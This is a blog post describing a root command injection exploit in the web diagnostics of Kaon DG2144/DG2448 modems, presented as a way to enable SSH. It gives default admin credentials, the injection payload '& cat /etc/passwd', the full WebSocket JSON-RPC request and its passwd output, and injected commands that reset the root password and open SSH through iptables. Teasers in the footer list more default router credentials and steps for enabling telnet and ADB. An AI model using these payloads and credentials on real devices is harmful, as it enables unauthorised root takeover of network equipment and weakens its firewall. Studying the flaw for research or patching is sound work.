Kaon DG2144 : Root Command Injection Exploit ( How To Enable SSH )

Kaon DG2144 : Root Command Injection Exploit ( How To Enable SSH )


Kaon Dg2448 & Kaon DG2144 

Upon analyzing the modems Web service, it is evident that the functions accessible through the URLs: 

http://192.168.1.1/#/home/administration and http://192.168.1.1/#/home/status 

are vulnerable to command execution as root. The specific functions susceptible to this vulnerability are Ping, Traceroute, NsLookup under Diagnostics, and Target under Connectivity Check as well as Numerous others.

 

 To exploit this vulnerability, a user must be logged in with the credentials: Username: admin Password: admin@DG2144 

 

By navigating to the Connectivity Check section on the main page and injecting the command '& cat /etc/passwd',  sensitive information such as user details can be retrieved. 

 The obtained data includes the root user's information: 

root:x:0:0:root:/root:/bin/ash 

daemon:*:1:1:daemon:/var:/bin/false

ftp:*:55:55:ftp:/home/ftp:/bin/false

...

admin:x:0:0::/home/admin:/bin/false 

 

Request Specifics: these requests are made via Websockets (192.168.1.1/ws) {"jsonrpc":"2.0","id":1317719,"method":"api","params":{"path":"/admin/ping","action":"post","msg":{"target":"& cat /etc/passwd","size":"16","no":"3"},"sid":"2e14d9d31758725543fc2404aeec17eb"}}

which when executed by kwebsockd :

 ping -c 3 -s 64 -i 1 -W 1 & cat /etc/passwd > /tmp/ping_result 2>&1 &


 Furthermore, the vulnerability allows appending various commands to the existing ping call, where the command results are read from a file on the system for display on the webpage. 

This can be exploited to execute commands like enabling SSH access:

 & echo -e "password\npassword" | passwd root 

& iptables -D zone_lan_input 2 

& iptables -A INPUT -i eth0 -p tcp --dport 22 -j ACCEPT

Comments

Post a Comment

Popular posts from this blog

f@st3864 Telnet/Serial

f@st3864 Telnet/Serial R.e F@st3864v2 Optus F@st3864 The quickest way to openly access this routers administration tools is to log in via http://192.168.0.1/main.html?loginuser=0 logging in with the default admin/Y3s0ptus loginuser=0 ***support/support ***loginuser=1 ***user/user*****loginuser=2 ***To Activate telnet*** going to management/system settings " download this file " sysinfo.f24 open the file in notepad the file splits into two sections the section we want is headed by backup config: <?xml version="1.0"?> <DslCpeConfig version="3.0"> and closed by </InternetGatewayDevice> </DslCpeConfig> so by copying all the xml information between these two points and pasting into a new notepad you have created our new backup file, before we save it and close find <X_GVT_Telnet_Enable>FALSE</X_GVT_Telnet_Enable> Change FALSE to TRUE then save the file as backupconfig.xml then use this XML file to update the settings, also i
Read more

ZTE MF910V Root exploit

ZTE MF910/ZTE910B/ZTE MF910V/Telstra MF910v  This guide exists in both linux and windows format Please follow the instructions as per O/S or untill instructions converge |+++++++++++++++++++++++++++++++++++++| Default credentials: For ZTE MF910/ZTE910B/ZTE MF910V/Telstra MF910v root:oelinux123 Web Interface Password: password |+++++++++++++++++++++++++++++++++++++| Getting Setup: Download the mode switch html to run locally: http://lopoteam.com/3AY9 Also ensure you have ADB (Android Debug Bridge) installed on your computer: ADB: Linux: https://dl.google.com/android/repository/platform-tools-latest-linux.zip http://lopoteam.com/37Bw Windows: https://dl.google.com/android/repository/platform-tools-latest-windows.zip http://lopoteam.com/37Ac |+++++++++++++++++++++++++++++++++++++| Lets Begin |+++++++++++++++++++++++++++++++++++++| Plug your device into the computer to download drivers. Linux: Open Terminal cd (*a
Read more

ZTE MF910V Mode Switch / ADB Enable / AT Commands / Debug

ZTE MF910V Mode Switch / ADB Enable / AT Commands / Debug AT mode : /goform/goform_set_cmd_process?goformId=SET_DEVICE_MODE&debug_enable=X Change X to either 0 or 1 this enables and disables qualcomm services, Debub / Adb :  /goform/goform_set_cmd_process?goformId=USB_MODE_SWITCH&usb_mode=X Change X to be the value matching the desired mode. 1-4 is RNDIS 5 is CDC 6 is ADB. or this page is uploaded to any web dir: UPDATED(2017) Download this file: tools.html Upload it to any directory and use it to switch thru modes via html
Read more